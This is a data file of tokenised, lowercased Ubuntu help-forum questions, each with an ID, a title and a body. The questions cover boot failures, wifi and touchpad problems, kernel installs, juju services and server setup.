428962	no such partition and can not boot into bios	i am running a dual boot system for windows 7 and ubuntu . i 've tried to delete the ubuntu os by deleting the partition on which ubuntu was installed . i 've also deleted all unnamed partitions in order to create more space for windows 7 . it appears i have mistakenly deleted the partition with the bios . now when i turn on my laptop i get an error message : no such partion entering rescue mode grub rescue i have been trying to re-install my windows or ubuntu again but because i probably deleted my bios partition i ca n't boot from cd or even usb . i have tried a few solutions from the internet but to no avail . pls help me
428964	bluetooth does not work unless i start windows os	i have a toshiba satellite laptop which came with windows os pre-installed . the bluetooth says `` no adapters found '' unless i start up windows os then boot to linux . i tried installing other bluetooth programs but this did not solve the problem .
428968	/etc/profile permission denied	i 'm running an ubuntu 12.04 lts partition and i 've recently have had issues logging in . from the gui login screen , when i enter my username and password , it takes me right back to the login screen . this is different from when i enter my username and password incorrectly . so i entered alt+ctrl+f1 to access the terminal and i signed in . it then reads : -bash : /etc/profile permission denied from what i 've tested , the only commands that i can run from terminal are basic terminal commands like ls and pwd . i tried changing my access to /etc : sudo chmod 755 /etc i get the errors : sudo : unable to open /etc/sudoers : permission denied sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin if i run it without sudo i get a permission denied . if someone knows how to get around this issue that would be great
428972	wireless networks fail to connect after install/update of 12.04	this is not a repeat question . none of the previously answered questions answer this one . a usb stick was used to run a live cd of ubuntu 12.04 . wireless internet worked . the same session was used to install ubuntu 12.04 . after restart , wireless internet worked . after updating the system ( without changing any options in ubuntu at all ) ... wireless internet will not connect . apt will not help , as the machine must connect to internet via wireless . the solution to this problem can not involve using cat5 cable , because there is no lan connection on a cell phone being used as a wireless hotspot . if there is a way to restore the functionality of the device that was present during a live session , the problem will be marked as solved . if this question has a hint of antagonism , it is based on the fact that reading 20 questions regarding this subject resulted in a poor attitude towards the reading comprehension of those providing answers .
428973	stuck on bootloop when i tried to install ubuntu touch on my galaxy nexus	i tried to flash ubuntu touch ( saucy ) on my i9250 and i got stuck on bootloop before i was able to push and flash the last file saucy-preinstalled-touch-armhf.zip . now i am unable to boot into bootloader . when i open my phone it shows the google logo and then it turns off . the problem is i can not boot into bootloader/fastboot so i can flash the file . any ideas ?
428981	temperature sensor showing really high temperature	i am using hp probook 4740s and my laptop is running on ubuntu 13.04 . i am facing some heating issues but could n't found out which hardware was actually causing the heating issue.i have installed psensor and saw that temp6 is reading 127 celsius which is about 260 fahrenheit . can anyone tell me from which hardware i am getting this temp6 temperature reading ?
428982	in ubuntu 12.04 can i disable iptables firewall ?	i want to create a minecraft server for me and my friends to connect to ( port 25565 ) . i already use ddclient , which updates the external ip so that the data sent to the hostname is forwarded to the external ip . i want to remove iptables because it is not going to help with anything suited for what i am trying to do . although , if i remove it is there any other way i can forward the traffic through my external ip ? - or would it forward by default ? and may i add , i would not like to just set the default rule to accept all connections because this does n't solve my issue . i also know that if i keep iptables , i will have to set up/modify an init script to update the rules every x minutes for the setup to work which will take even longer ? but then i also realise that there for a reason - a firewall : to protect against hackers . though , my isp ( sky ) does have a firewall that is default to block all connections , unless the port has been specified ; in which i have forwarded the ports that are necessary for my server to run . would this be safe enough to run my server behind ? and can i remove iptables ? thank you !
428986	mp4v and mp4a in ubuntu vlc	in 13.10 , i have this error in vlc : [ 0x7f529c0038a0 ] main decoder error : no suitable decoder module for fourcc `mp4v ' . vlc probably does not support this sound or video format . [ 0x7f529c004470 ] main decoder error : no suitable decoder module for fourcc `mp4a ' . vlc probably does not support this sound or video format . i thought that ubuntu supported all the latest codecs . is there a way to fix this ? or even a way to convert my video for use ? i imagine that it could have to do with ffmpeg , but i have no idea .
428988	advice installing/initializing ubuntu 12.04	i hope this falls within the remit of the forum . my question is simple , is there anything specific i should do when installing/initializing the above mentioned version of ubuntu ? this question can extend to personal preferences and things people have learnt the hard way . should i create a recovery partition etc ? thanks in advance
428989	ubuntu vps automatic backup script	can anyone tell me how to create a backup script for ubuntu vps which is used as a webserver . i also want to add it as a cron job so that it runs automatically every day midnight at 12:00am programs which i use in my vps : apache2 php5 mysql phpmyadmin sites-enabled ssl thanks in advance !
428996	installing dhcp server on fog server using ubuntu 12.10 when it was not installed initially ?	i installed fog server 0.32 on ubuntu 12.10 , and when i first did it , i connected it to our network thinking that i was going to get away with ghosting the machines where they sit . however , after looking at our crappy windows dhcp server , i found that there is no way to differentiate the allworx phones from the computers using windows dns . so like many others i 've decided to create an external lan and ghost the machines there . i wanted to install dhcp3 from apt-get but the package manager does n't list dhcp3 , what package should i install instead to get this working ?
428997	working ubuntu does n't boot after placing ssd with it to another pc	i had a working ubuntu 12.04 on ssd in my pc . then i needed to use it on a laptop . i took out the ssd disk and put to the laptop instead of its hdd . now ubuntu does n't boot , which means that after loading bios screen the laptop restarts . no unusual messages for me . the last one i quickly managed to see is `` entering multiboot bla bla bla '' i loaded ubuntu from livecd and installed boot repair tools , then fixed grub , putting it on a partition with bios_grub flag . order of disks to load from is ok . i have ony ssd and i choose to load from it i tried to switch ahci/compatible in bios ( in case it helps , though i do n't know exactly what it means ) , switch off wifi and other devices in bios . this did n't help . do you have any ideas how to fix this ? any advices appreciated
428998	ubuntu 13.10 does not detect the touchpad on samsung ativ 8	just installed ubuntu 13.10 on my samsung ativ 8 . unfortunately the touchpad is not detected . output from xinput list : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ atmel atmel maxtouch digitizer id=11 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft bluetooth notebook mouse 5000 id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ webcam sc-10hdp12631n id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] anybody have an idea how this can be activated ?
428999	arm-none-linux path problem	i downloaded this toolchain : arm-2013.11-33-arm-none-linux-gnueabi-i686-pc-linux-gnu.tar.bz2 i extracted here : /cross and changed name as arm-none-linux-gnueabi- after that i saw bin file like as : $ ls arm-none-linux-gnueabi/bin arm-none-linux-gnueabi-addr2line arm-none-linux-gnueabi-ar arm-none-linux-gnueabi-as arm-none-linux-gnueabi-c++ arm-none-linux-gnueabi-c++filt arm-none-linux-gnueabi-cpp arm-none-linux-gnueabi-elfedit arm-none-linux-gnueabi-g++ arm-none-linux-gnueabi-gcc ... . after that i did path like as : export path= $ path : /cross/arm-none-linux-gnueabi/bin there is no error message so far , but when i tried the compile a simple c codes : $ arm-none-linux-gnueabi-gcc -o2 -wall -werror -o hello hello.c i got this error : arm-none-linux-gnueabi-gcc : command not found i tried a lot of times but everytime i got nothing . what is the problem ?
429001	ubuntu server+subversion+bugzilla+lan email	for succesfull setup of ubuntu server with subversion , bugzilla and local ( lan ) email , do i need registered domain for such setup ?
429002	automatic download problem from ubuntu apps directory-ubuntu 12.04	once i opened online ubuntu apps directory to download software , when i clicked on `` available on software center '' then external protocol request came , by mistake i checked the box of remember me next time and then clicked do nothing . please tell me how to fix this problem and enable automatic download from ubuntu apps directory .
429003	wifi stopped working after system update 12.04	the wifi on my dell xps 13 stopped working yesterday . it connects , and drops the connection a few seconds later . it was working before , the only thing i can think of that happened was a routine system update . this is the chipset : 01:00.0 network controller [ 0280 ] : qualcomm atheros ar9462 wireless network adapter [ 168c:0034 ] ( rev 01 ) any ideas ? edit : this seems to have been a hardware problem , replacing the wifi-card solved the problem .
429006	usb does n't start automatically	my computer does n't load usb drives the way i expect . i 'm running ubuntu 12.04 on an ideapad p500 . i have read the ubuntu wiki titled mount/usb and i still find my situation strange . please read on for details . whenever i plug in a usb external drive , the computer mounts it as usb0 and creates a utility icon . if i clic to eject or right-click to unmount or eject , i get the message mount : /media/usb0 is not in the fstab ( and you are not root ) then i go to the terminal and unmount it with umount ; the usb will become available the way i would have expected from the beginning : the icon will be a usb drive , its name will be kingston , and i can right-click to eject it ? my question is why is n't it available like that at first ? and also , is n't umount supposed to eject it ? please explain in a `` mounting/unmounting for dummies '' style . thank you .
429007	touchpad sensitivity way too high on lowest setting ( zenbookprime ux32vd-dh71 ) 12.04lts	i have followed the guide https : //help.ubuntu.com/community/asuszenbookprime here and i am having multiple issues with my touchpad . 1 ) the sensitivity is far too high even when on the lowest setting in the settings option . is there a commandline way to reduce it further ? 2 ) the area of the touchpad that is registered as a right-click is only at the very bottom of the touchpad and so most of my right-clicks are registered as left-clicks . how can i make the right-click area be taller ? i have an elantech touchpad . i set up the clickpad.sh as described , removing the inverse scrolling because i am not a fan of that : # ! /bin/bash gsettings set org.gnome.settings-daemon.peripherals.touchpad disable-while-typing false xinput set-prop `` etps/2 elantech touchpad '' `` synaptics clickpad '' 1 xinput set-prop `` etps/2 elantech touchpad '' `` synaptics soft button areas '' 1956 0 1737 0 1304 1955 1737 0 syndaemon -i 1.7 -d -t -k xinput set-prop `` etps/2 elantech touchpad '' `` synaptics scrolling distance '' 35 , 35 # scroll more responsive xinput set-prop `` etps/2 elantech touchpad '' `` synaptics finger '' 1 , 15 , 50 # ups click sensitivity , values '1 , 15 , 255 ' disable trackstick emulation xinput set-prop `` etps/2 elantech touchpad '' `` synaptics tap fasttap '' 1 # faster taps
429012	qemu kernel zimage file problem	im trying the install virtual embedded linux , i installed qemu and i installed kernel like as : $ wget https : //www.kernel.org/pub/linux/kernel/v3.x/linux-3.8.2.tar.bz2 in kernel file enter these commands : $ make arch=arm cross_compile= $ cross menuconfig $ make arch=arm cross_compile= $ cross zimage -j2 i obtained a zimage file ( 2.1mb application/octet-stream in arm/arm/boot direction ) but when i did try to run qemu i got nothing in qemu screen : for example , i wrote this command : $ qemu-system-arm -m versatilepb -kernel zimage qemu screen opened but there is nothing on screen , ( kernel panic or some words there is nothing on screen . ) there is something wrong with my zimage file but i did not found : (
429013	ubuntu 12.04 lts on a macbook pro 5.1	i 'm dual-booting a 15 '' macbook pro 5.1 ( with nvidia 9400m and 9600m dual graphics cards ) with mac os x 10.8 mountain lion and ubuntu 12.04 gives me a blank screen before i get to the desktop . i am using refind as a boot loader ( and ubuntu is loaded in efi mode . ) when installing from a usb drive i can use the graphical installer by using the nomodeset kernel switch ( entered using the grub interface . ) however , i ca n't access the desktop using either the try ubuntu without installing or after installation . i have tried the acpi=off , nomodeset and outb 0x728 1 ... methods using grub , to no avail . how can i get the desktop to load ? are there any more hacks i can try ? do i need to install graphics drivers ?
429014	how can i get a file 's ubuntuone url from the terminal ?	how can i get the ubuntuone url from a file in a bash script ? here 's what my script does so far : i run the script via nautilus actions , and it requires one parameter and an url in the clipboard . the parameter must be a flac file name . the script checks that the url in the clipboard is valid and also if the flac file is a valid flac file . it then extracts some of the tags and produce two html files . one containing information about the song , the other one adding a line in an ”index file” – a file with one line per song with links to the different html files and so on… anyway , to run the script properly right now i need to do the following : 1 . in nautilus , right click the file , then ubuntu one → publish 2 . right click the file again , then ubuntu one → copy url ( sometimes i need to press f5 first for this to work properly ) 3 . right click the file again , then nautilus actions → flac tags to html 4 . the script then asks for a comment via yad ( ”yet another dialog” – a fork of zenity ) so , all i want to do at the moment , is to eliminate step 1 and 2 . it would be nice if the script could do that for me . the file name and path should be enough information for the script , i think .
429015	destroying service before removing the relation causes both services to hang at dying	i deployed wordpress and mysql and add relation between wordpress and mysql . i try to destroy wordpress before removing the relation between wordpress and mysql . now , both services are hanging at dying . what should i do ? is there any way to manually delete the service cleanly ? i am running ubuntu 12.04 lts . here is the output from juju status mysql : controller : ~ $ juju status mysql environment : maas machines : `` 0 '' : agent-state : started agent-version : 1.16.6.1 dns-name : node-1.master instance-id : /maas/api/1.0/nodes/node-345fea0a-9f84-11e3-88be-525400429c50/ series : precise services : mysql : charm : cs : precise/mysql-35 exposed : false life : dying relations : cluster : - mysql db : - wordpress units : mysql/0 : agent-state : started agent-version : 1.16.6.1 life : dying machine : `` 0 '' public-address : node-1.master part of the output from juju status ( yes , it ends at db : - mysql ) wordpress : charm : cs : precise/wordpress-21 exposed : false life : dying relations : db : - mysql log related ( juju debug-log ) : node-1:014-03-03 19:32:12 info juju runner.go:253 worker : start `` uniter '' node-1:014-03-03 19:32:12 info juju.worker.uniter uniter.go:83 unit `` mysql/0 '' started node-1:014-03-03 19:32:12 info juju.worker.uniter modes.go:421 modeinit starting node-1:014-03-03 19:32:12 info juju.worker.uniter modes.go:29 updating unit addresses node-1:014-03-03 19:32:12 info juju.worker.uniter.filter filter.go:454 unit is dying node-1:014-03-03 19:32:12 debug juju.worker.uniter.filter filter.go:504 charm check skipped , unit is dying node-1:014-03-03 19:32:12 info juju.worker.uniter modes.go:54 reconciling relation state node-1:014-03-03 19:32:12 debug juju.worker.uniter.filter filter.go:322 got service change node-1:014-03-03 19:32:12 info juju.worker.uniter uniter.go:517 joining relation `` wordpress : db mysql : db '' node-1:014-03-03 19:32:12 debug juju.worker.uniter.filter filter.go:504 charm check skipped , unit is dying node-1:014-03-03 19:32:12 debug juju.worker.uniter.filter filter.go:338 got relations change node-1:014-03-03 19:32:12 debug juju.worker.uniter.filter filter.go:314 got unit change node-1:014-03-03 19:32:12 info juju.worker.uniter uniter.go:543 joined relation `` wordpress : db mysql : db '' node-1:014-03-03 19:32:12 debug juju.worker.uniter modes.go:423 modeinit exiting node-1:014-03-03 19:32:12 info juju.worker.uniter modes.go:421 modecontinue starting node-1:014-03-03 19:32:12 info juju.worker.uniter modes.go:67 loading uniter state node-1:014-03-03 19:32:12 info juju.worker.uniter modes.go:108 found uncommitted `` config-changed '' hook node-1:014-03-03 19:32:12 info juju.worker.uniter uniter.go:363 committing `` config- changed '' hook node-1:014-03-03 19:32:12 debug juju.worker.uniter.filter filter.go:330 got config change node-1:014-03-03 19:32:12 debug juju.worker.uniter.filter filter.go:334 preparing new config event node-1:014-03-03 19:32:12 error juju git.go:188 worker/uniter/charm : git command failed : exit status 128 node-1 : ath : /var/lib/juju/agents/unit-mysql-0/charm node-1 : rgs : [ ] string { `` commit '' , `` -- allow-empty '' , `` -m '' , `` completed \ '' config-changed\ '' hook . '' } node-1 : rror : object file .git/objects/d4/7f136f29e2319929b668b4e7917dca934b462f is empty node-1 : atal : loose object d47f136f29e2319929b668b4e7917dca934b462f ( stored in .git/objects/d4/7f136f29e2319929b668b4e7917dca934b462f ) is corrupt node-1:014-03-03 19:32:12 debug juju.worker.uniter modes.go:423 modecontinue exiting node-1:014-03-03 19:32:12 info juju.worker.uniter uniter.go:105 unit `` mysql/0 '' shutting down : modecontinue : git commit failed : exit status 128 node-1:014-03-03 19:32:12 error juju.worker.uniter.filter filter.go:117 tomb : dying node-1:014-03-03 19:32:12 error juju runner.go:211 worker : exited `` uniter '' : modecontinue : git commit failed : exit status 128 node-1:014-03-03 19:32:12 info juju runner.go:245 worker : restarting `` uniter '' in 3s node-1:014-03-03 19:32:15 info juju runner.go:253 worker : start `` uniter '' node-1:014-03-03 19:32:15 info juju.worker.uniter uniter.go:83 unit `` mysql/0 '' started node-1:014-03-03 19:32:15 info juju.worker.uniter modes.go:421 modeinit starting node-1:014-03-03 19:32:15 info juju.worker.uniter modes.go:29 updating unit addresses node-1:014-03-03 19:32:15 info juju.worker.uniter.filter filter.go:454 unit is dying node-1:014-03-03 19:32:15 debug juju.worker.uniter.filter filter.go:504 charm check skipped , unit is dying node-1:014-03-03 19:32:15 info juju.worker.uniter modes.go:54 reconciling relation state node-1:014-03-03 19:32:15 debug juju.worker.uniter.filter filter.go:322 got service change node-1:014-03-03 19:32:15 info juju.worker.uniter uniter.go:517 joining relation `` wordpress : db mysql : db '' node-1:014-03-03 19:32:15 debug juju.worker.uniter.filter filter.go:504 charm check skipped , unit is dying node-1:014-03-03 19:32:15 debug juju.worker.uniter.filter filter.go:338 got relations change node-1:014-03-03 19:32:15 debug juju.worker.uniter.filter filter.go:314 got unit change node-1:014-03-03 19:32:15 info juju.worker.uniter uniter.go:543 joined relation `` wordpress : db mysql : db '' node-1:014-03-03 19:32:15 debug juju.worker.uniter modes.go:423 modeinit exiting node-1:014-03-03 19:32:15 info juju.worker.uniter modes.go:421 modecontinue starting node-1:014-03-03 19:32:15 info juju.worker.uniter modes.go:67 loading uniter state node-1:014-03-03 19:32:15 info juju.worker.uniter modes.go:108 found uncommitted `` config-changed '' hook node-1:014-03-03 19:32:15 info juju.worker.uniter uniter.go:363 committing `` config- changed '' hook node-1:014-03-03 19:32:15 debug juju.worker.uniter.filter filter.go:330 got config change node-1:014-03-03 19:32:15 debug juju.worker.uniter.filter filter.go:334 preparing new config event node-1:014-03-03 19:32:15 error juju git.go:188 worker/uniter/charm : git command failed : exit status 128 node-1 : ath : /var/lib/juju/agents/unit-mysql-0/charm node-1 : rgs : [ ] string { `` commit '' , `` -- allow-empty '' , `` -m '' , `` completed \ '' config-changed\ '' hook . '' } node-1 : rror : object file .git/objects/d4/7f136f29e2319929b668b4e7917dca934b462f is empty node-1 : atal : loose object d47f136f29e2319929b668b4e7917dca934b462f ( stored in .git/objects/d4/7f136f29e2319929b668b4e7917dca934b462f ) is corrupt node-1:014-03-03 19:32:15 debug juju.worker.uniter modes.go:423 modecontinue exiting node-1:014-03-03 19:32:15 info juju.worker.uniter uniter.go:105 unit `` mysql/0 '' shutting down : modecontinue : git commit failed : exit status 128 node-1:014-03-03 19:32:15 error juju.worker.uniter.filter filter.go:117 tomb : dying node-1:014-03-03 19:32:15 error juju runner.go:211 worker : exited `` uniter '' : modecontinue : git commit failed : exit status 128 node-1:014-03-03 19:32:15 info juju runner.go:245 worker : restarting `` uniter '' in 3s please let me know if there is an easy fix ? any suggestion would be appreciated . thanks .
429016	error when logging in flashes by too fast for me to read it	i had to do a hard reset on my machine because my ubuntu vm in vmware player was completely frozen and causing some strange behavior . waited about 5 minutes , then hit the reset switch . now when i try to login i see some sort of error screen but it is maybe on screen for 50ms . the only text i can make out is something about dispatcher . i even tried using screen capture software but even at 32 frames per second ( the max ) i ca n't see the error message . i can login using the low-graphics mode ( ctrl alt f2 ) . how can i figure out what the problem is ? i did manage to capture the only feedback i 'm getting ( below ) . it is n't much help . i also did an apt-get update/upgrade , no change .
429017	my webcam not working on ubuntu 3.10	my laptop camera is not working in ubuntu 13.10 . like if i go to http : //webcamtoy.com/ , it says no webcam found .
429018	ubuntu phone on lumia 520	now i see that ubuntu phone seems stable and look really good , but i do n't know if i can install that on my lumia 520 , cause i prefer to have ubuntu on my phone than the windows phone . could you please tell me if that is possible , how can i install that ?
429022	need help regarding dual booting windows 7 ultimate and ubuntu 13.10	my pc : amd phenom 2 x4 asus m4a8tm-le board 6 gb ram nvidia 2gb gt520 card hard disk : 500gb i have a 300gb partition for windows ( i already have windows 7 ultimate 'service pack 1 ' - 64bit , my disk do n't have any service pack . i updated to sp1 later ) . and also 2x100gb data drives . what i did so far : cleared and deleted one 100gb partition . boot from disk install ubuntu alongside windows 7 it automatically created 6gb swap and rest 94gb for linux . linux installed fine , but thereafter when i press windows 7 ( loader ) disk read error press ctrl+alt+del to restart . i tried repairing windows boot ( worked when without sp1 ) and using easybcd to add linux to windows bootloader ( didnt work for me ) . please someone help .
429027	bash : ./worldofgoo.bin : permission denied	i tried to launch world of goo from the terminal ( ./worldofgoo.bin ) , but somehow i could n't launch it . it displays the following error : bash : ./worldofgoo.bin : permission denied can anyone help me with this ?
429028	an error occured while mounting / . ( also /home )	i 've read through related threads but a lot of the suggestions seemed somewhat vague and unhelpful . i re-installed ubuntu 13.10 yesterday after running into some problems . i set it up to where / was on my 32gb ssd and the /home and swap partitions were on my 500gb hdd ran into an issue with grub , so i started ubuntu with a boot disk and ran boot-repair , restarted and everything seemed to be working fine . however , a few hours later i rebooted and was greeted with the an error occurred while mounting / . '' and `` an error occurred while mounting /home messages . i pressed to try to fix them both but it did nothing . any help would be greatly appreciated , preferably in the form of detailed and deliberate instruction . here is the ouput of blkid /dev/loop0 : type= '' squashfs '' /dev/sda1 : uuid= '' 6c42b421-8288-499b-b0dc-bd8fd555c1b9 '' sec_type= '' ext2 '' type= '' ext3 '' /dev/sdb1 : uuid= '' 656d5dd0-09be-4c20-8bac-6656e2af9184 '' sec_type= '' ext2 '' type= '' ext3 '' /dev/sdc1 : uuid= '' e203-b14a '' type= '' vfat '' i am currently running fsck.ext3 -cdfty -c 0 /dev/sd**on both disks . will post results .
429029	copy live cd to partition and add it to grub	i would like to keep the live cd as a separate partition ( read only if possible ) so that i can use it to boot my computer should the main partition be damaged . i could then restore the main partition from a backup . i created a partition of the right size and copied the live cd from a usb stick to the partition using dd . then i mounted it successfully and ran sudo update-grub , but the partition was not added to the grub menu . how to proceed ? $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 232.9g 0 disk |-sda1 8:1 0 28g 0 part / |-sda2 8:2 0 28g 0 part |-sda3 8:3 0 4.7g 0 part |-sda4 8:4 0 1k 0 part `-sda5 8:5 0 1.9g 0 part [ swap ] sdb 8:16 0 1.8t 0 disk `-sdb1 8:17 0 1.8t 0 part sdc 8:32 0 931.5g 0 disk `-sdc1 8:33 0 931.4g 0 part
429033	how do i find out when debian packages were last updated ?	i access an ubuntu 10.04lts server that is administered by someone else , i have a feeling that it has n't been getting updates/upgrades recently . is there a way to check on the command line when updates were last taken , without sudo privileges ?
429034	placa de video geforce gt 520m	translated text ( using google translate ) : good afternoon , i have a dell xps-14z laptop it has a geforce gt 520m 1gb . i 'm not getting this video card work properly because microport output - > vga image is not sent to the monitor . how do i solve this problem ? how do i know if placated is working 100 % ? thank you ! original text : boa tarde , tenho um notebook dell xps-14z ele tem uma placa de vídeo geforce gt 520m 1gb . não estou conseguindo fazer essa placa de vídeo funcionar corretamente pois a saída microport - > vga não está enviado imagem para o monitor . como resolvo esse problema ? como que eu sei se aplaca está funcionando 100 % ? obrigado !
429043	installing 3.13 kernel on saucy ( 13.10 ) - possible ?	i wanted to install 3.13.5 kernel from http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.13.5-trusty/ . i know that the folders are called trusty but can i install them on 13.10 ? after tying dpkg -i on the packages i get the following : $ sudo dpkg -i linux-headers-3.13.5-031305_3.13.5-031305.201402221823_all.deb linux-headers-3.13.5-031305-generic_3.13.5-031305.201402221823_i386.deb linux-image-3.13.5-031305-gene ric_3.13.5-031305.201402221823_i386.deb.1 [ sudo ] password for xxx : selecting previously unselected package linux-headers-3.13.5-031305 . ( reading database ... 174675 files and directories currently installed . ) unpacking linux-headers-3.13.5-031305 ( from linux-headers-3.13.5-031305_3.13.5-031305.201402221823_all.deb ) ... selecting previously unselected package linux-headers-3.13.5-031305-generic . unpacking linux-headers-3.13.5-031305-generic ( from linux-headers-3.13.5-031305-generic_3.13.5-031305.201402221823_i386.deb ) ... selecting previously unselected package linux-image-3.13.5-031305-generic . unpacking linux-image-3.13.5-031305-generic ( from linux-image-3.13.5-031305-generic_3.13.5-031305.201402221823_i386.deb.1 ) ... done . setting up linux-headers-3.13.5-031305 ( 3.13.5-031305.201402221823 ) ... setting up linux-headers-3.13.5-031305-generic ( 3.13.5-031305.201402221823 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.13.5-031305-generic /boot/vmlinuz-3.13.5-031305-generic error ! bad return status for module build on kernel : 3.13.5-031305-generic ( i686 ) consult /var/lib/dkms/fglrx/13.251/build/make.log for more information . setting up linux-image-3.13.5-031305-generic ( 3.13.5-031305.201402221823 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.5-031305-generic /boot/vmlinuz-3.13.5-031305-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.13.5-031305-generic /boot/vmlinuz-3.13.5-031305-generic error ! bad return status for module build on kernel : 3.13.5-031305-generic ( i686 ) consult /var/lib/dkms/fglrx/13.251/build/make.log for more information . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.5-031305-generic /boot/vmlinuz-3.13.5-031305-generic update-initramfs : generating /boot/initrd.img-3.13.5-031305-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.13.5-031305-generic /boot/vmlinuz-3.13.5-031305-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.13.5-031305-generic /boot/vmlinuz-3.13.5-031305-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.13.5-031305-generic /boot/vmlinuz-3.13.5-031305-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.13.5-031305-generic found initrd image : /boot/initrd.img-3.13.5-031305-generic found linux image : /boot/vmlinuz-3.11.0-17-generic found initrd image : /boot/initrd.img-3.11.0-17-generic found memtest86+ image : /boot/memtest86+.bin done edit that 's my /var/lib/dkms/fglrx/13.251/build/make.log dkms make.log for fglrx-13.251 for kernel 3.13.5-031305-generic ( i686 ) pon , 3 mar 2014 , 21:41:07 cet amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.13.5-031305-generic/build subdirs=/var/lib/dkms/fglrx/13.251/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.5-031305-generic' cc [ m ] /var/lib/dkms/fglrx/13.251/build/2.6.x/firegl_public.o /var/lib/dkms/fglrx/13.251/build/2.6.x/firegl_public.c : in function ‘kcl_geteffectiveuid’ : /var/lib/dkms/fglrx/13.251/build/2.6.x/firegl_public.c:1758:5 : error : incompatible types when returning type ‘kuid_t’ but ‘kcl_type_uid’ was expected return current_euid ( ) ; ^ /var/lib/dkms/fglrx/13.251/build/2.6.x/firegl_public.c:1762:1 : warning : control reaches end of non-void function [ -wreturn-type ] } ^ make [ 2 ] : *** [ /var/lib/dkms/fglrx/13.251/build/2.6.x/firegl_public.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx/13.251/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.5-031305-generic' make : *** [ kmod_build ] error 2 build failed with return value 2
429045	how do i make an outfacing dhcp interface ?	i am running ubuntu desktop 12.04 and i want to make an outfacing interface that hands out external ips mapped to my hostname for ease of use with iptables . how should i configure this ?
429049	minecraft framerate drop after 5 minutes	i installed 13.10 last night on a dell precision m6500 and i was amazed that i could get ~50 fps , but then after about 5 minutes , it took a sudden drop to about 2 fps . this happens every time and framerate will not go back up unless i kill all java processes and restart minecraft . how can i prevent this frame drop ?
429050	freeing up partition space	i have a 10gb ubuntu partition and i am starting to run out of hard disk space . what are some large things i can remove to free up space and where are they located ?
429052	whenever i shut down i lose photos , passwords , etc . how do i fix this ?	every time i shut down i lose all my photos , passwords and the like , i need to know how to fix this so it saves my changes and my photos .
429053	how can i reduce hysteresis in the clickpad area ?	i have a problem with my touchpad : every time i use the clickpad ( left click or right click ) the pointer moves a little bit ( sometimes more than a little ) , so i end up clicking something i do n't want to . i found out that this can be solved by increasing the values of horizhysteresis and verthysteresis . but when i do that , the movement of the pointer with the thouchpad gets less fluent . so my question is : is there a way to increase the values of hysteresis only in the clickpad area ? so that the rest of the touchpad has a different hysteresis value than the clickpad . that way the pointer would n't jump every time i click , but the movement in the touchpad would still be fluent . best regards , juan manuel
429055	how to prevent unity changing workspace when activating window previously partially draged across two workspaces	how to prevent unity from changing automatically workspace when activating minimized window previously partially dragged across two workspaces the way that bigger part of window is in other workspace . example assuming 4 workspaces as 2x2 matrix . starting in top left workspace . start firefox + maximize it . ctrl alt t , start terminal in standard size . drag terminal down to see just its upper quarter , ie . hide its lower part outside of current workspace . click on firefox , bring it on foreground . click the terminal icon on the launcher . the unity will switch to the workspace down showing lower part of the terminal window . how to prevent or disable such a workspace switching mode for windows crossing workspace borders ? it makes little sense to allow unity to follow bigger part of window to another workspace . the workaround is to have just one workspace , or to do described action in the bottom workspace , but it is all about setting the user , not the software .
429057	toggling mouse keys in ubuntu 13.10	i have enabled mouse keys in nniversal access - > pointing and clicking i 've read that shift + numlock is suppose to toggle the mouse keys , but it does n't seem to be working for me . i would like to be able to use mouse keys and be able to toggle them off so i can also use the keypad .
429058	i can not get ubuntu to install side by side	i have a windows 7 pc and a 2 tb hard drive , which is partitioned as follows : system : 100 mb os c : 944.38 gb ntfs primary partition development f : logical partition - 906.91 gb ntfs hp_recovery d : primary partions - 11.25 gb ntfs now , i did do a defragment on the c partition . i then tried to shrink it and windows only will allow it to shrink by a few mb . there is approximately 655 gb free though . well , then shrank the f drive and freed up 300 gb of space . i then booted the live cd of ubuntu 13.10 and tried installing and it never gives me the choice of installing ubuntu in the new freed space . i can only erase the entire drive , which is what i do n't want . any ideas ? ed cohen
429064	why can not ubuntu resolve the proxy hostname while upgrading to 12.10 ?	i 'm on ubuntu 12.04 lts ( precise ) . i can not upgrade to 12.10 using the update manager . each time i try , it shows that 12.10 is available to upgrade : however , when i click on `` upgrade '' , i get the following error : unable to load page problem occurred while loading the url : http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/main/dist-upgrader-all/current/releaseannouncement.html ? lang=en_us & os=ubuntu & ver=12.10 can not resolve proxy hostname ( ) screenshot for same : it is not a problem with my internet because all of the normal updates for 12.04 work . it is just that i can not upgrade to 12.10 . how do i resolve this ?
429065	how can i audit commands executed by each user in the terminal ?	i have two users on my ubuntu desktop . i want to audit the commands that these two users execute each day . i am not talking about the history command , because i need to know the commands each user executed specifically . i can not log in as or su to either of these users . is there any way i can do this ?
